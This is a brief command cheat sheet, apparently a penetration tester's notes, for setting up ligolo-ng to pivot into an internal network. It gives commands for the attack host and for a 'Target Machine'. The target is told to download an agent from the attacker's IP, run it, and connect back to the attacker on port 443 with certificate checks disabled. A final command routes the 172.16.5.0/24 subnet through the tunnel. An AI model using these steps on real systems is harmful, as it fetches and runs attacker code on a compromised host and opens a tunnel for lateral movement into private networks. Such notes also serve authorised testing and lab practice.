https://github.com/nicocha30/ligolo-ng/releases
cd /opt
mkdir ligolo
cd ligolo
Agent File:
sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz
Proxy File:
sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz
on attack host (aka your machines)
sudo ip tuntap add user mstrkoffee mode tun ligolo
sudo ip link set ligolo up
./lin-proxy -selfcert -laddr 0.0.0.0:443
Run these commands on the Target Machine:
wget http://<your attacker machine IP here>/lin-agent
chmod +x lin-agent
./lin-agent -connect <attacker IP here>:443 -ignore-cert
on attack host
sudo ip route add 172.16.5.0/24 dev ligolo